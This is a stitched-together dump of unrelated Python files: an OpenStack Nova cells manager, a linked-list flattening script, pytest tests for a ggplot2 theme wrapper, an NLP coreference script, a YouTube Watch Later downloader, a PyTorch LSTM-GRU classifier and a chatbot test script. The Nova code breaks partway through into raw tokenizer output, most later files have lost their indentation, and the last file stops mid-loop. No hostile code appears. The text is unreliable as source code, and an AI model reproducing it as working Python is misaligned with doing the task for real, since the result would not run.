        info = {'updated_list': False}

        def _next_instance():
            try:
                instance = next(self.instances_to_heal)
            except StopIteration:
                if info['updated_list']:
                    return
                threshold = CONF.cells.instance_updated_at_threshold
                updated_since = None
                if threshold > 0:
                    updated_since = timeutils.utcnow() - datetime.timedelta(
                        seconds=threshold)
                self.instances_to_heal = cells_utils.get_instances_to_sync(
                    ctxt, updated_since=updated_since, shuffle=True,
                    uuids_only=True)
                info['updated_list'] = True
                try:
                    instance = next(self.instances_to_heal)
                except StopIteration:
                    return
            return instance

        rd_context = ctxt.elevated(read_deleted='yes')

        for i in range(CONF.cells.instance_update_num_instances):
            while True:
                # Yield to other greenthreads
                time.sleep(0)
                instance_uuid = _next_instance()
                if not instance_uuid:
                    return
                try:
                    instance = objects.Instance.get_by_uuid(rd_context,
                                                            instance_uuid)
                except exception.InstanceNotFound:
                    continue
                self._sync_instance(ctxt, instance)
                break

    def _sync_instance(self, ctxt, instance):
        """Broadcast an instance_update or instance_destroy message up to
        parent cells.
        """
        if instance.deleted:
            self.instance_destroy_at_top(ctxt, instance)
        else:
            self.instance_update_at_top(ctxt, instance)

    def build_instances(self, ctxt, build_inst_kwargs):
        """Pick a cell (possibly ourselves) to build new instance(s) and
        forward the request accordingly.
        """
        # Target is ourselves first.
        filter_properties = build_inst_kwargs.get('filter_properties')
        if (filter_properties is not None and
                not isinstance(filter_properties['instance_type'],
                               objects.Flavor)):
            # NOTE(danms): Handle pre-1.30 build_instances() call. Remove me
            # when we bump the RPC API version to 2.0.
            flavor = objects.Flavor(**filter_properties['instance_type'])
            build_inst_kwargs['filter_properties'] = dict(
                filter_properties, instance_type=flavor)
        instances = build_inst_kwargs['instances']
        if not isinstance(instances[0], objects.Instance):
            # NOTE(danms): Handle pre-1.32 build_instances() call. Remove me
            # when we bump the RPC API version to 2.0
            build_inst_kwargs['instances'] = instance_obj._make_instance_list(
                ctxt, objects.InstanceList(), instances, ['system_metadata',
                                                          'metadata'])
        our_cell = self.state_manager.get_my_state()
        self.msg_runner.build_instances(ctxt, our_cell, build_inst_kwargs)

    def get_cell_info_for_neighbors(self, _ctxt):
        """Return cell information for our neighbor cells."""
        return self.state_manager.get_cell_info_for_neighbors()

    def run_compute_api_method(self, ctxt, cell_name, method_info, call):
        """Call a compute API method in a specific cell."""
        response = self.msg_runner.run_compute_api_method(ctxt,
                                                          cell_name,
                                                          method_info,
                                                          call)
        if call:
            return response.value_or_raise()

    def instance_update_at_top(self, ctxt, instance):
        """Update an instance at the top level cell."""
        self.msg_runner.instance_update_at_top(ctxt, instance)

    def instance_destroy_at_top(self, ctxt, instance):
        """Destroy an instance at the top level cell."""
        self.msg_runner.instance_destroy_at_top(ctxt, instance)

    def instance_delete_everywhere(self, ctxt, instance, delete_type):
        """This is used by API cell when it didn't know what cell
        an instance was in, but the instance was requested to be
        deleted or soft_deleted. So, we'll broadcast this everywhere.
        """
        if isinstance(instance, dict):
            instance = objects.Instance._from_db_object(ctxt,
                                                        objects.Instance(),
                                                        instance)
        self.msg_runner.instance_delete_everywhere(ctxt, instance,
                                                   delete_type)

    def instance_fault_create_at_top(self, ctxt, instance_fault):
        """Create an instance fault at the top level cell."""
        self.msg_runner.instance_fault_create_at_top(ctxt, instance_fault)

    def bw_usage_update_at_top(self, ctxt, bw_update_info):
        """Update bandwidth usage at top level cell."""
        self.msg_runner.bw_usage_update_at_top(ctxt, bw_update_info)

    def sync_instances(self, ctxt, project_id, updated_since, deleted):
        """Force a sync of all instances, potentially by project_id,
        and potentially since a certain date/time.
        """
        self.msg_runner.sync_instances(ctxt, project_id, updated_since,
                                       deleted)

    def service_get_all(self, ctxt, filters):
        """Return services in this cell and in all child cells."""
        responses = self.msg_runner.service_get_all(ctxt, filters)
        ret_services = []
        # 1 response per cell. Each response is a list of services.
        for response in responses:
            services = response.value_or_raise()
            for service in services:
                service = cells_utils.add_cell_to_service(
                    service, response.cell_name)
                ret_services.append(service)
        return ret_services

    @oslo_messaging.expected_exceptions(exception.CellRoutingInconsistency)
    def service_get_by_compute_host(self, ctxt, host_name):
        """Return a service entry for a compute host in a certain cell."""
        cell_name, host_name = cells_utils.split_cell_and_item(host_name)
        response = self.msg_runner.service_get_by_compute_host(ctxt,
                                                               cell_name,
                                                               host_name)
        service = response.value_or_raise()
        service = cells_utils.add_cell_to_service(service, response.cell_name)
        return service

    def get_host_uptime(self, ctxt, host_name):
        """Return host uptime for a compute host in a certain cell

        :param host_name: fully qualified hostname. It should be in format of
                          parent!child@host_id
        """
        cell_name, host_name = cells_utils.split_cell_and_item(host_name)
        response = self.msg_runner.get_host_uptime(ctxt, cell_name,
                                                   host_name)
        return response.value_or_raise()

    def service_update(self, ctxt, host_name, binary, params_to_update):
        """Used to enable/disable a service. For compute services, setting to
        disabled stops new builds arriving on that host.

        :param host_name: the name of the host machine that the service is
                          running
        :param binary: The name of the executable that the service runs as
        :param params_to_update: eg. {'disabled': True}
        :returns: the service reference
        """
        cell_name, host_name = cells_utils.split_cell_and_item(host_name)
        response = self.msg_runner.service_update(
            ctxt, cell_name, host_name, binary, params_to_update)
        service = response.value_or_raise()
        service = cells_utils.add_cell_to_service(service, response.cell_name)
        return service

    def service_delete(self, ctxt, cell_service_id):
        """Deletes the specified service."""
        cell_name, service_id = cells_utils.split_cell_and_item(
            cell_service_id)
        self.msg_runner.service_delete(ctxt, cell_name, service_id)

    @oslo_messaging.expected_exceptions(exception.CellRoutingInconsistency)
    def proxy_rpc_to_manager(self, ctxt, topic, rpc_message, call, timeout):
        """Proxy an RPC message as-is to a manager."""
        compute_topic = CONF.compute_topic
        cell_and_host = topic[len(compute_topic) + 1:]
        cell_name, host_name = cells_utils.split_cell_and_item(cell_and_host)
        response = self.msg_runner.proxy_rpc_to_manager(ctxt, cell_name,
                host_name, topic, rpc_message, call, timeout)
        return response.value_or_raise()

    def task_log_get_all(self, ctxt, task_name, period_beginning,
                         period_ending, host=None, state=None):
        """Get task logs from the DB from all cells or a particular
        cell.

        If 'host' is not None, host will be of the format 'cell!name@host',
        with '@host' being optional. The query will be directed to the
        appropriate cell and return all task logs, or task logs matching
        the host if specified.

        'state' also may be None. If it's not, filter by the state as well.
        """
        if host is None:
            cell_name = None
        else:
            cell_name, host = cells_utils.split_cell_and_item(host)
            # If no cell name was given, assume that the host name is the
            # cell_name and that the target is all hosts
            if cell_name is None:
                cell_name, host = host, cell_name
        responses = self.msg_runner.task_log_get_all(ctxt, cell_name,
                task_name, period_beginning, period_ending,
                host=host, state=state)
        # 1 response per cell. Each response is a list of task log
        # entries.
        ret_task_logs = []
        for response in responses:
            task_logs = response.value_or_raise()
            for task_log in task_logs:
                cells_utils.add_cell_to_task_log(task_log,
                                                 response.cell_name)
                ret_task_logs.append(task_log)
        return ret_task_logs

    @oslo_messaging.expected_exceptions(exception.CellRoutingInconsistency)
    def compute_node_get(self, ctxt, compute_id):
        """Get a compute node by ID in a specific cell."""
        cell_name, compute_id = cells_utils.split_cell_and_item(
            compute_id)
        response = self.msg_runner.compute_node_get(ctxt, cell_name,
                                                    compute_id)
        node = response.value_or_raise()
        node = cells_utils.add_cell_to_compute_node(node, cell_name)
        return node

    def compute_node_get_all(self, ctxt, hypervisor_match=None):
        """Return list of compute nodes in all cells."""
        responses = self.msg_runner.compute_node_get_all(ctxt,
                hypervisor_match=hypervisor_match)
        # 1 response per cell. Each response is a list of compute_node
        # entries.
        ret_nodes = []
        for response in responses:
            nodes = response.value_or_raise()
            for node in nodes:
                node = cells_utils.add_cell_to_compute_node(node,
                                                            response.cell_name)
                ret_nodes.append(node)
        return ret_nodes

    def compute_node_stats(self, ctxt):
        """Return compute node stats totals from all cells."""
        responses = self.msg_runner.compute_node_stats(ctxt)
        totals = {}
        for response in responses:
            data = response.value_or_raise()
            for key, val in six.iteritems(data):
                totals.setdefault(key, 0)
                totals[key] += val
        return totals

    def actions_get(self, ctxt, cell_name, instance_uuid):
        response = self.msg_runner.actions_get(ctxt, cell_name, instance_uuid)
        return response.value_or_raise()

    def action_get_by_request_id(self, ctxt, cell_name, instance_uuid,
                                 request_id):
        response = self.msg_runner.action_get_by_request_id(ctxt, cell_name,
                                                            instance_uuid,
                                                            request_id)
        return response.value_or_raise()

    def action_events_get(self, ctxt, cell_name, action_id):
        response = self.msg_runner.action_events_get(ctxt, cell_name,
                                                     action_id)
        return response.value_or_raise()

    def consoleauth_delete_tokens(self, ctxt, instance_uuid):
        """Delete consoleauth tokens for an instance in API cells."""
        self.msg_runner.consoleauth_delete_tokens(ctxt, instance_uuid)

    def validate_console_port(self, ctxt, instance_uuid, console_port,
                              console_type):
        """Validate console port with child cell compute node."""
        instance = objects.Instance.get_by_uuid(ctxt, instance_uuid)
        if not instance.cell_name:
            raise exception.InstanceUnknownCell(instance_uuid=instance_uuid)
        response = self.msg_runner.validate_console_port(ctxt,
                instance.cell_name, instance_uuid, console_port,
                console_type)
        return response.value_or_raise()

    def get_capacities(self, ctxt, cell_name):
        return self.state_manager.get_capacities(cell_name)

    def bdm_update_or_create_at_top(self, ctxt, bdm, create=None):
        """BDM was created/updated in this cell. Tell the API cells."""
        # TODO(ndipanov): Move inter-cell RPC to use objects
        bdm = base_obj.obj_to_primitive(bdm)
        self.msg_runner.bdm_update_or_create_at_top(ctxt, bdm, create=create)

    def bdm_destroy_at_top(self, ctxt, instance_uuid, device_name=None,
                           volume_id=None):
        """BDM was destroyed for instance in this cell. Tell the API cells."""
        self.msg_runner.bdm_destroy_at_top(ctxt, instance_uuid,
                                           device_name=device_name,
                                           volume_id=volume_id)

    def get_migrations(self, ctxt, filters):
        """Fetch migrations applying the filters."""
        target_cell = None
        if "cell_name" in filters:
            _path_cell_sep = cells_utils.PATH_CELL_SEP
            target_cell = '%s%s%s' % (CONF.cells.name, _path_cell_sep,
                                      filters['cell_name'])

        responses = self.msg_runner.get_migrations(ctxt, target_cell,
                                                   False, filters)
        migrations = []
        for response in responses:
            migrations += response.value_or_raise()
        return migrations

    def instance_update_from_api(self, ctxt, instance, expected_vm_state,
                                 expected_task_state, admin_state_reset):
        """Update an instance in its cell."""
        self.msg_runner.instance_update_from_api(ctxt, instance,
                                                 expected_vm_state,
                                                 expected_task_state,
                                                 admin_state_reset)

    def start_instance(self, ctxt, instance):
        """Start an instance in its cell."""
        self.msg_runner.start_instance(ctxt, instance)

    def stop_instance(self, ctxt, instance, do_cast=True,
                      clean_shutdown=True):
        """Stop an instance in its cell."""
        response = self.msg_runner.stop_instance(ctxt, instance,
                                                 do_cast=do_cast,
                                                 clean_shutdown=clean_shutdown)
        if not do_cast:
            return response.value_or_raise()

    def cell_create(self, ctxt, values):
        return self.state_manager.cell_create(ctxt, values)

    def cell_update(self, ctxt, cell_name, values):
        return self.state_manager.cell_update(ctxt, cell_name, values)

    def cell_delete(self, ctxt, cell_name):
        return self.state_manager.cell_delete(ctxt, cell_name)

    def cell_get(self, ctxt, cell_name):
        return self.state_manager.cell_get(ctxt, cell_name)

    def reboot_instance(self, ctxt, instance, reboot_type):
        """Reboot an instance in its cell."""
        self.msg_runner.reboot_instance(ctxt, instance, reboot_type)

    def pause_instance(self, ctxt, instance
op|':'
newline|'\n'
indent|' '
string|'"""Pause an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'pause_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|unpause_instance
dedent|''
name|'def'
name|'unpause_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Unpause an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'unpause_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|suspend_instance
dedent|''
name|'def'
name|'suspend_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Suspend an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'suspend_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|resume_instance
dedent|''
name|'def'
name|'resume_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Resume an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'resume_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|terminate_instance
dedent|''
name|'def'
name|'terminate_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'delete_type'
op|'='
string|"'delete'"
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Delete an instance in its cell."""'
newline|'\n'
comment|'# NOTE(rajesht): The `delete_type` parameter is passed so that it will'
nl|'\n'
comment|'# be routed to destination cell, where instance deletion will happen.'
nl|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'terminate_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'delete_type'
op|'='
name|'delete_type'
op|')'
newline|'\n'
nl|'\n'
DECL|member|soft_delete_instance
dedent|''
name|'def'
name|'soft_delete_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Soft-delete an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'soft_delete_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|resize_instance
dedent|''
name|'def'
name|'resize_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'flavor'
op|','
nl|'\n'
name|'extra_instance_updates'
op|','
nl|'\n'
name|'clean_shutdown'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Resize an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'resize_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'flavor'
op|','
name|'extra_instance_updates'
op|','
nl|'\n'
name|'clean_shutdown'
op|'='
name|'clean_shutdown'
op|')'
newline|'\n'
nl|'\n'
DECL|member|live_migrate_instance
dedent|''
name|'def'
name|'live_migrate_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'block_migration'
op|','
nl|'\n'
name|'disk_over_commit'
op|','
name|'host_name'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Live migrate an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'live_migrate_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'block_migration'
op|','
nl|'\n'
name|'disk_over_commit'
op|','
nl|'\n'
name|'host_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|revert_resize
dedent|''
name|'def'
name|'revert_resize'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Revert a resize for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'revert_resize'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|confirm_resize
dedent|''
name|'def'
name|'confirm_resize'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Confirm a resize for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'confirm_resize'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|reset_network
dedent|''
name|'def'
name|'reset_network'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Reset networking for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'reset_network'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|inject_network_info
dedent|''
name|'def'
name|'inject_network_info'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Inject networking for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'inject_network_info'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|snapshot_instance
dedent|''
name|'def'
name|'snapshot_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Snapshot an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'snapshot_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|backup_instance
dedent|''
name|'def'
name|'backup_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|','
name|'backup_type'
op|','
name|'rotation'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Backup an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'backup_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|','
nl|'\n'
name|'backup_type'
op|','
name|'rotation'
op|')'
newline|'\n'
nl|'\n'
DECL|member|rebuild_instance
dedent|''
name|'def'
name|'rebuild_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_href'
op|','
name|'admin_password'
op|','
nl|'\n'
name|'files_to_inject'
op|','
name|'preserve_ephemeral'
op|','
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'rebuild_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_href'
op|','
nl|'\n'
name|'admin_password'
op|','
name|'files_to_inject'
op|','
nl|'\n'
name|'preserve_ephemeral'
op|','
name|'kwargs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|set_admin_password
dedent|''
name|'def'
name|'set_admin_password'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'new_pass'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'set_admin_password'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'new_pass'
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_keypair_at_top
dedent|''
name|'def'
name|'get_keypair_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'user_id'
op|','
name|'name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'get_keypair_at_top'
op|'('
name|'ctxt'
op|','
name|'user_id'
op|','
name|'name'
op|')'
newline|'\n'
name|'keypairs'
op|'='
op|'['
name|'resp'
op|'.'
name|'value'
name|'for'
name|'resp'
name|'in'
name|'responses'
name|'if'
name|'resp'
op|'.'
name|'value'
name|'is'
name|'not'
name|'None'
op|']'
newline|'\n'
nl|'\n'
name|'if'
name|'len'
op|'('
name|'keypairs'
op|')'
op|'=='
number|'0'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'None'
newline|'\n'
dedent|''
name|'elif'
name|'len'
op|'('
name|'keypairs'
op|')'
op|'>'
number|'1'
op|':'
newline|'\n'
indent|' '
name|'cell_names'
op|'='
string|"', '"
op|'.'
name|'join'
op|'('
op|'['
name|'resp'
op|'.'
name|'cell_name'
name|'for'
name|'resp'
name|'in'
name|'responses'
nl|'\n'
name|'if'
name|'resp'
op|'.'
name|'value'
name|'is'
name|'not'
name|'None'
op|']'
op|')'
newline|'\n'
name|'LOG'
op|'.'
name|'warning'
op|'('
name|'_LW'
op|'('
string|'"The same keypair name \'%(name)s\' exists in the "'
nl|'\n'
string|'"following cells: %(cell_names)s. The keypair "'
nl|'\n'
string|'"value from the first cell is returned."'
op|')'
op|','
nl|'\n'
op|'{'
string|"'name'"
op|':'
name|'name'
op|','
string|"'cell_names'"
op|':'
name|'cell_names'
op|'}'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'keypairs'
op|'['
number|'0'
op|']'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
# ---- next file ----
class Node:
def __init__(self, data) -> None:
self.data = data
self.right = self.down = None
class LinkedList:
def __init__(self) -> None:
self.head = self.rear = None
def insert(self, item, location):
temp = Node(item)
if self.rear == None:
self.head = self.rear = temp
return
if 'right' in location.lower():
self.rear.right = temp
self.rear = temp
return
if 'down' in location.lower():
temp.down = self.rear.down
self.rear.down = temp
return
def sortedMerge(a, b):
result = None
if a == None:
return b
if b == None:
return a
if a.data <= b.data:
result = a
result.down = sortedMerge(a.down, b)
else:
result = b
result.down = sortedMerge(a, b.down)
result.right = None
return result
def flatter(node):
if node == None or node.right == None:
return node
return sortedMerge(node, flatter(node.right))
def display(llist):
    temp = llist.head
while temp:
print(temp.data, end=' ==> ')
temp_down = temp.down
while temp_down:
print(temp_down.data, end=' ---> ')
temp_down = temp_down.down
temp = temp.right
linked_list = LinkedList()
linked_list.insert(5, 'right')
linked_list.insert(30, 'down')
linked_list.insert(8, 'down')
linked_list.insert(7, 'down')
linked_list.insert(10, 'right')
linked_list.insert(20, 'down')
linked_list.insert(19, 'right')
linked_list.insert(50, 'down')
linked_list.insert(22, 'down')
linked_list.insert(28, 'right')
linked_list.insert(45, 'down')
linked_list.insert(40, 'down')
linked_list.insert(35, 'down')
display(linked_list)
print()
flatter(linked_list.head)
display(linked_list)
print()
# ---- next file: tests/test_theme.py ----
from typing import Any, Dict
import pytest
from grgr.ggplot2.theme import Theme, ThemeElement
@pytest.mark.parametrize("kwargs, answer", [
({
"foo": '"bar"'
}, 'test(foo="bar")'),
({
"foo_bar": '"bar"'
}, 'test(foo.bar="bar")'),
({
"foo": '"bar"',
"foo_bar": '"bar"'
}, 'test(foo="bar",foo.bar="bar")'),
({}, "test()"),
])
def test_theme(kwargs: Dict[str, Any], answer: str):
assert Theme("test", **kwargs).tor() == answer
@pytest.mark.parametrize("kwargs, answer", [
({
"foo": '"bar"'
}, 'test(foo="bar")'),
({
"foo_bar": '"bar"'
}, 'test(foo_bar="bar")'),
({
"foo": '"bar"',
"foo_bar": '"bar"'
}, 'test(foo="bar",foo_bar="bar")'),
({}, "test()"),
])
def test_theme_element(kwargs: Dict[str, Any], answer: str):
assert ThemeElement("test", **kwargs).tor() == answer
# ---- next file: main.py ----
from openie import StanfordOpenIE
import os
import sys
import spacy
import neuralcoref
import stanza
from nltk.parse import stanford
from nltk.parse.stanford import StanfordParser
from nltk.tree import ParentedTree, Tree
from numpy import *
import warnings
warnings.filterwarnings('ignore')
java_path = "C:/Program Files/Java/jdk-11.0.11/bin/java.exe"
os.environ['JAVAHOME'] = java_path
os.environ['STANFORD_PARSER'] = './model/stanford-parser.jar'
os.environ['STANFORD_MODELS'] = './model/stanford-parser-4.2.0-models.jar'
def sentence_split(str_centence):
list_ret = list()
for s_str in str_centence.split('.'):
if '?' in s_str:
list_ret.extend(s_str.split('?'))
elif '!' in s_str:
list_ret.extend(s_str.split('!'))
else:
if s_str != "":
list_ret.append(s_str)
return list_ret
def search(dic,start):
queue=[]
queue.append(start)
bfsflag=set()
bfsflag.add(start)
while queue:
v=queue.pop(0)
bfsflag.add(v)
for item in dic[v]:
if (not (item in bfsflag))& (not (item in queue)) :
queue.append(item)
return list(bfsflag)
def bfs(dic):
max=0
for key in dic:
v=search(dic,key)
if (len(v)>max):
max=len(v)
return (max)
if __name__ =="__main__":
parser = StanfordParser()
corenlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos,lemma,depparse')
nlp = spacy.load('en_core_web_lg')
neuralcoref.add_to_pipe(nlp)
# with StanfordOpenIE() as client:
path=sys.argv[1]
files= os.listdir(path)
list1 = []
rate=[]
for file in files:
if not os.path.isdir(file):
f = open(path+"/"+file,'r',encoding='utf-8')
content=f.read()
content=content.replace('\n', '').replace('\r', '')
doc = nlp(content)
content_cor= doc._.coref_resolved
documents= nlp(content_cor)
rel={}
words=set()
for sentence in list(documents.sents):
wordinsent=set()
wordvecinset=set()
for word in sentence:
# print(word)
if str(word.tag_) in ['NN','NNS','NNP','NNPS','WP']:
# print(word, word.tag_)
wordinsent.add(word.text)
# wordvecinset.add(word)
words.add(word)
se1=list(wordinsent)
for w in se1:
if not(w in rel):
rel[w]=wordinsent
elif w in rel:
rel[w]=rel[w]|wordinsent
for wd1 in words:
for wd2 in words:
if (wd1.text!=wd2.text) & (wd1.similarity(wd2)>=0.8):
# print(wd1.text+" "+wd2.text)
rel[wd1.text].add(wd2.text)
rel[wd2.text].add(wd1.text)
rate.append((bfs(rel)/len(rel)))
print("Avg:"+str(mean(rate)))
# ---- next file ----
"""
Download Youtube Watch Later playlist to a local directory, eternalize it,
then remove playlist.
Usage:
yt-download-watch-later [options]
Options:
-h, --help Display this message.
--version Show version information.
"""
VERSION = 1.0
import subprocess
import shutil
import glob
import sys, os
import docopt
from ..config.youtube_pipeline import YoutubePipelineConfigFile
NETWORK_RESOURCE = 'network'
STORAGE_RESOURCE = 'storage'
def main():
arguments = docopt.docopt(__doc__, version=VERSION)
coordinate = shutil.which('coordinate')
eternalize = shutil.which('eternalize')
yt_remove_watchlater = shutil.which('yt-remove-watchlater')
yt_dl = shutil.which('youtube-dl')
if not all([coordinate, eternalize, yt_remove_watchlater, yt_dl]):
print([coordinate, eternalize, yt_remove_watchlater, yt_dl])
raise RuntimeError("Not all tools were found.")
conf = YoutubePipelineConfigFile()
olddir = os.getcwd()
os.chdir(conf.download_path)
print("Downloading Watch Later...")
# download Watch Later
subprocess.check_call([
coordinate, NETWORK_RESOURCE, '--',
yt_dl, '--cookies', conf.cookies, 'https://www.youtube.com/playlist?list=WL'
])
# check if there are any files
files = glob.glob('*')
no_files = len(files)
if no_files == 0:
print("No new videos downloaded.")
return
elif no_files == 1:
print("Eternalizing...")
else:
print("Eternalizing {} files...".format(no_files))
# eternalize files
subprocess.check_call([
coordinate, STORAGE_RESOURCE, '--',
eternalize,
] + files + [conf.eternalize_target])
print("Removing watch later items...")
# remove watchlater
subprocess.check_call([
yt_remove_watchlater
])
os.chdir(olddir)
# ---- next file (repo: andrew-miao/ECE657A_Project-text-classification) ----
import torch
import torch.nn as nn
import torch.nn.functional as F
from LSTM_Attn_GRU.config_LSTMAttnGRU import Config
class LSTMAttnGRU(nn.Module):
def __init__(self, output_size):
super(LSTMAttnGRU, self).__init__()
self.lstm = nn.LSTM(Config.embedding_size, Config.hidden_size, batch_first=True, num_layers=Config.n_layers)
self.fc1 = nn.Linear(Config.embedding_size, Config.fc1_size)
self.fc2 = nn.Linear(Config.fc1_size, Config.fc2_size)
self.fc3 = nn.Linear(Config.gru_hidden_size, Config.fc3_size)
self.fc4 = nn.Linear(Config.fc3_size, output_size)
self.sigmoid = nn.Sigmoid()
self.gru = nn.GRU(Config.embedding_size, Config.gru_hidden_size, batch_first=True)
self.dropout = nn.Dropout()
self.logsoftmax = nn.LogSoftmax(dim=1)
self.softmax = nn.Softmax(dim=2)
def attention(self, x, lstm_out,):
x_compress = self.fc1(x)
attn_weight = self.softmax(self.fc2(x_compress))
attn_out = torch.bmm(attn_weight, lstm_out)
cat_out = torch.cat([x_compress, attn_out], dim=2)
return cat_out
def forward(self, x):
lstm_out, _ = self.lstm(x)
cat_out = self.attention(x, lstm_out)
gru_out, _ = self.gru(cat_out)
gru_out = gru_out[:, 0, :]
output = self.dropout(self.fc3(gru_out))
output = F.relu(self.fc4(output))
output = self.logsoftmax(output)
        return output
# ---- next file: JPS_Chatbot/UI/source/test/fill_the_cache.py ----
# in one hour, after one c
#
import time
import urllib
import urllib.parse
import urllib.request
import re
from datetime import datetime
import random
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
def fire_query_to_chatbot(question):
# x = input()
values = {'question': question}
tail = (urllib.parse.urlencode(values))
url = "http://127.0.0.1:5000/chemistry_chatbot/query?type=worldavatar&question=" + tail
#http://127.0.0.1:5000/chemistry_chatbot/query?type=wolfram&question=%C2%A0%20show%20me%20the%20vibration%20frequency%20of%20H2O2
r = urllib.request.urlopen(url)
return r
# def make_request(question):
# url = "http://127.0.0.1:5000/query?question=" + question
# options = Options()
# options.add_argument('--headless')
# driver = webdriver.Firefox(options=self.options)
# driver.get(url)
# html_source = self.driver.find_element_by_tag_name('html').get_attribute('innerHTML')
# self.driver.quit()
# html = BeautifulSoup(html_source, 'html.parser')
# return html
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Current Time =", current_time)
with open('test_log', 'w') as f:
f.write('test begins at' + current_time + '\n')
f.close()
with open('error_log', 'w') as f:
f.write('test begins at' + current_time + '\n')
f.close()
with open('page_questions') as f:
page_questions = [q.replace('\n', '') for q in f.readlines()]
# print(page_questions)
print('number of questions in total', len(page_questions))
with open('verified_questions', 'w') as f:
f.write(' ')
f.close()
verified_questions = []
counter = 0
good_counter = 0
with open('page_questions') as f:
counter = counter + 1
print('we are at number ', counter)
page_questions = [q.replace('\n', '') for q in f.readlines()]
# for q in random.choices(page_questions, k= 10):
for q in page_questions:
# print(q)
print('the question is', q)
